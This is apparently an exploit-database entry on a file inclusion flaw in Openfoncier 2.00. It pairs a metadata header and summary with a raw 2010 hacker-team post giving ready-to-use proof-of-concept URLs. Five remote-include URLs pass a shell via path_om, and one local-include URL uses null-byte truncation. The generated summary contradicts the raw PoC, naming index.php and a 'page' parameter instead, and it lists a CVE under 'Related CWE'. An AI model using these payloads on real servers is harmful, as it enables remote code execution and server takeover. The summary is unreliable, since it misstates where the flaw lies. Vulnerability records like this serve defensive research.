Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability

vendor:

Openfoncier

by:

cr4wl3r

9,3

CVSS

HIGH

RFI/LFI

CWE

Product Name: Openfoncier

Affected Version From: 2.00

Affected Version To: 2.00

Patch Exists: YES

Related CWE: CVE-2011-4010

CPE: a:openfoncier:openfoncier:2.00

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2011

Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability

Openfoncier 2.00 is vulnerable to remote file include and local file include. An attacker can exploit this vulnerability to include remote files and execute arbitrary code on the vulnerable server. The vulnerability is located in the "index.php" file. The vulnerable code is: include($_GET['page']); The attacker can exploit this vulnerability by sending a malicious URL with the "page" parameter set to a remote file.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

==============================================================
Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability
==============================================================

[+] Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: https://adullact.net/frs/download.php/4567/openmairie_foncier_2.00.zip
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id

[+] Thanks to: opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

[~] RFI:
http://shell4u.tk/[path]/obj/action.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/architecte.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/avis.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/bible.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/blocnote.class.php?path_om=[Shell]

[~] LFI:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]


# Inj3ct0r.com [2010-04-24]